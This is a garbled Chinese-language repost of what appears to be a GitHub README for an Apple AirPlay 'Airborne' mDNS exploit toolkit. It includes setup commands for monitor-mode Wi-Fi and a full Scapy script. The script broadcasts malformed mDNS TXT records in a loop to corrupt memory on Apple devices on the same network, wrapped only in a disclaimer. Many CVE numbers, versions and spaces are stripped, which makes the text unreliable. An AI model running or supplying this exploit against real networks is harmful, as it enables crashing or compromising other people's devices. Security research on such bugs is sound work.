核心内容摘要
17·c1起草的最新版本
项目标题与描述CVE-
iOS “Airborne” 漏洞利用工具集本项目专注于分析和演示CVE-
漏洞的利用方法。
该漏洞存在于Apple设备的AirPlayReceiver组件中是一个由mDNS TXT记录解析引起的严重内存安全问题。
攻击者通过构造特制的mDNS数据包可能导致目标设备进程内存损坏在本地网络环境中造成严重安全威胁。
该漏洞影响范围广泛包括iOS、iPadOS、macOS、tvOS和visionOS等多个Apple操作系统版本。
CVSS
1评分为
8分属于严重级别漏洞。
功能特性漏洞验证提供完整的PoC概念验证代码演示如何通过构造恶意mDNS数据包触发目标设备内存损坏本地网络攻击利用mDNS协议特性实现在同一Wi-Fi网络内对Apple设备的潜在攻击实时数据包构造使用Scapy库动态构造包含畸形TXT记录的mDNS响应包持续攻击模式支持循环发送攻击包用于稳定性测试和漏洞确认环境要求明确详细说明所需的网络配置和硬件条件确保测试环境正确搭建安装指南系统要求Kali Linux或类似渗透测试发行版支持监控模式的Wi-Fi适配器Python
xApple设备仅用于授权测试安装步骤更新系统并安装依赖sudoaptupdatesudoaptinstallpython3-scapy avahi-daemon -ysudosystemctl start avahi-daemon配置Wi-Fi适配器为监控模式sudoiplinksetwlan0 downsudoiwconfig wlan0 mode monitorsudoiplinksetwlan0 up克隆项目仓库gitclone https://github.com/B1ack4sh/Blackash-CVE-2025-
gitcdBlackash-CVE-
配置攻击参数nanoCVE-2025-
py修改代码中的攻击者IP地址和网络接口配置使用说明基础使用启动漏洞利用sudopython3 CVE-2025-
py监控目标设备状态使用Wireshark或tcpdump捕获目标Apple设备的网络流量sudotcpdump -i wlan0host[目标设备IP]-w capture.pcap攻击场景实验室环境测试在受控环境中验证Apple设备的安全性安全研究分析mDNS协议实现中的内存管理问题渗透测试在授权范围内评估网络设备的漏洞状态
注意事项必须与目标Apple设备处于同一Wi-Fi网络监控模式对于正确接收端口5353的组播mDNS流量至关重要仅用于自有设备或已获得测试权限的设备核心代码漏洞触发主程序fromscapy.allimport*importtime# 崩溃触发和稳定性测试以确认漏洞# 设置攻击者IP和接口attacker_ip
10.
10.
1
10ifacewlan0# 构建畸形的mDNS TXT记录txt_records[bmodelAppleTV3,2,bdeviceidaa:bb:cc:dd:ee:ff,bfeatures0x100029ff,# 正常特征值boversizedAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA# 溢出的超长数据]# 创建mDNS组播DNS数据包dnsDNS(id0,qr0,# 查询标志opcode0,# 操作码qdcount1,# 问题计数ancount1,# 回答计数qdDNSQR(qname_airplay._tcp.local,qtypePTR),anDNSRR(rrname_airplay._tcp.local,typePTR,# 指针记录类型rclass0x8001,# 类别标志ttl120,# 生存时间rdataEvilAppleTV._airplay._tcp.local))# 构建包含畸形TXT记录的完整数据包pkt(Ether(dstff:ff:ff:ff:ff:ff)/# 广播MAC地址IP(dst
224.
0.
0.
/# mDNS组播地址UDP(sport5353,dport
/# mDNS标准端口dns/DNSRR(rrnameEvilAppleTV._airplay._tcp.local,typeSRV,# 服务记录ttl120,rclass1,rdlen0,# 资源数据长度rdata\x00\x00\x00\x
/DNSRR(rrnameEvilAppleTV._airplay._tcp.local,typeTXT,# 文本记录漏洞触发点ttl120,rclass1,rdatab\x
join(txt_records)# 使用null字节连接TXT记录))print([*] 发送畸形的AirPlay mDNS数据包...)# 循环发送攻击包间隔2秒sendp(pkt,ifaceiface,loop1,inter
漏洞技术说明# CVE-
iOS Airborne 漏洞 - 日志工件提取器# 漏洞描述# 这是一个释放后使用Use-After-Free问题已通过改进内存管理解决。
# 该问题在以下版本中修复# - macOS Sequoia
1
4# - tvOS
1
4# - macOS Ventura
13.
5# - iPadOS
17.
6# - macOS Sonoma
14.
5# - iOS
1
4 和 iPadOS
1
4# - visionOS
4# 本地网络中的攻击者可能能够损坏进程内存。
# 漏洞指标# ADP: CISA-ADP 基础分数:
8 严重# 攻击向量: CVSS:
1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H# CVE-
– mDNS TXT记录崩溃触发# 该漏洞影响AirPlayReceiver组件通过畸形的mDNS TXT记录触发。
免责声明⚠️ 重要声明本工具仅用于教育和研究目的。
请仅在您拥有或已获得测试权限的系统上使用。
未经授权的攻击测试是非法的可能导致严重的法律后果。
开发者和贡献者不对任何滥用行为负责。
FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ4gEQ07DuLD5IWxYUCgDuUo更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享